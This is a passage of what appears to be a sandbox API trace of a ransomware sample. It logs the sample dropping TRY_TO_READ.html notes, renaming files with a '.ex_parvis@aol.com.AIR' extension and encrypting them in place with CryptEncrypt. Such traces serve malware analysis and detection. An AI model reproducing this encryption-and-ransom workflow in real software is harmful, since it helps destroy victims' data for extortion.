pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.659] GetProcessHeap () returned 0x2e0000 [0161.659] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.659] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.659] WriteFile (in: hFile=0x508, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.660] WriteFile (in: hFile=0x508, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.660] WriteFile (in: hFile=0x508, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.661] ReadFile (in: hFile=0x508, lpBuffer=0x360c30, nNumberOfBytesToRead=0x50, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x360c30*, lpNumberOfBytesRead=0x2acf9c8*=0x50, lpOverlapped=0x0) returned 1 [0161.661] SetFilePointer (in: hFile=0x508, lDistanceToMove=-80, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.661] WriteFile (in: hFile=0x508, lpBuffer=0x3609c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3609c8*, lpNumberOfBytesWritten=0x2acf9c8*=0x50, lpOverlapped=0x0) returned 1 [0161.661] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Videos\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x979671d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x979671d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b14e8 [0161.661] FindNextFileW (in: hFindFile=0x3b14e8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x979671d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x979671d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.661] FindNextFileW (in: hFindFile=0x3b14e8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.661] FindNextFileW (in: hFindFile=0x3b14e8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0161.661] CreateFileW (lpFileName="C:\\\\Users\\Public\\Videos\\Sample Videos\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\videos\\sample videos\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c [0161.663] FindNextFileW (in: hFindFile=0x3b14e8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x979671d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x979671d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1b4e830, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.663] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.663] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.663] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Videos\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.664] lstrlenW (lpString="C:\\\\Users\\Public\\Videos\\desktop.ini") returned 35 [0161.664] GetProcessHeap () returned 0x2e0000 [0161.664] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xac) returned 0x33b3e8 [0161.664] lstrcpyW (in: lpString1=0x33b3e8, lpString2="C:\\\\Users\\Public\\Videos\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Videos\\desktop.ini") returned="C:\\\\Users\\Public\\Videos\\desktop.ini" [0161.664] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Videos\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.664] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.666] CreateFileW (lpFileName="C:\\\\Users\\Public\\Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c [0161.666] GetProcessHeap () returned 0x2e0000 [0161.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33b3e8 | out: hHeap=0x2e0000) returned 1 [0161.666] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=380) returned 1 [0161.666] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x17c [0161.666] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.666] GetProcessHeap () returned 0x2e0000 [0161.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.666] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.666] WriteFile (in: hFile=0x50c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.667] WriteFile (in: hFile=0x50c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.667] WriteFile (in: hFile=0x50c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.667] ReadFile (in: hFile=0x50c, lpBuffer=0x30a498, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesRead=0x2acf9c8*=0x17c, lpOverlapped=0x0) returned 1 [0161.667] SetFilePointer (in: hFile=0x50c, lDistanceToMove=-380, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.668] WriteFile (in: hFile=0x50c, lpBuffer=0x319788*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesWritten=0x2acf9c8*=0x17c, lpOverlapped=0x0) returned 1 [0161.668] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa2966c70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xa2966c70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1528 [0161.668] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.668] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.668] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", dwFileAttributes=0x80) returned 1 [0161.669] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 82 [0161.669] GetProcessHeap () returned 0x2e0000 [0161.669] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x336dd8 [0161.669] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" [0161.669] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0161.669] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.672] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0161.672] GetProcessHeap () returned 0x2e0000 [0161.672] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0161.673] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1347) returned 1 [0161.673] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x543 [0161.673] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.673] GetProcessHeap () returned 0x2e0000 [0161.673] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.673] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.673] WriteFile (in: hFile=0x510, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.675] WriteFile (in: hFile=0x510, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.675] WriteFile (in: hFile=0x510, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.675] ReadFile (in: hFile=0x510, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x543, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x543, lpOverlapped=0x0) returned 1 [0161.675] SetFilePointer (in: hFile=0x510, lDistanceToMove=-1347, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.675] WriteFile (in: hFile=0x510, lpBuffer=0x31d0730*, nNumberOfBytesToWrite=0x543, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0730*, lpNumberOfBytesWritten=0x2acf9c8*=0x543, lpOverlapped=0x0) returned 1 [0161.675] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.675] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.675] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi", dwFileAttributes=0x80) returned 1 [0161.676] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 82 [0161.676] GetProcessHeap () returned 0x2e0000 [0161.676] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x336dd8 [0161.676] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" [0161.676] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0161.676] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.678] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0161.678] GetProcessHeap () returned 0x2e0000 [0161.678] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0161.678] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=875520) returned 1 [0161.678] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xd5c00 [0161.678] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.678] GetProcessHeap () returned 0x2e0000 [0161.678] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.678] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.678] WriteFile (in: hFile=0x510, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.680] WriteFile (in: hFile=0x510, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.680] WriteFile (in: hFile=0x510, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.680] ReadFile (in: hFile=0x510, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xd5c00, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xd5c00, lpOverlapped=0x0) returned 1 [0161.707] SetFilePointer (in: hFile=0x510, lDistanceToMove=-875520, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.707] WriteFile (in: hFile=0x510, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xd5c00, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2acf9c8*=0xd5c00, lpOverlapped=0x0) returned 1 [0161.717] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.717] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.717] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", dwFileAttributes=0x80) returned 1 [0161.717] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 82 [0161.717] GetProcessHeap () returned 0x2e0000 [0161.718] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x336dd8 [0161.718] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" [0161.718] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0161.718] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.720] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0161.720] GetProcessHeap () returned 0x2e0000 [0161.720] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0161.720] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=11482605) returned 1 [0161.720] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xaf35ed [0161.721] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.721] GetProcessHeap () returned 0x2e0000 [0161.721] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.721] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.721] WriteFile (in: hFile=0x510, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.722] WriteFile (in: hFile=0x510, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.722] WriteFile (in: hFile=0x510, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.723] ReadFile (in: hFile=0x510, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xaf35ed, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xaf35ed, lpOverlapped=0x0) returned 1 [0162.361] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa2966c70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xa2966c70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1568 [0162.361] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 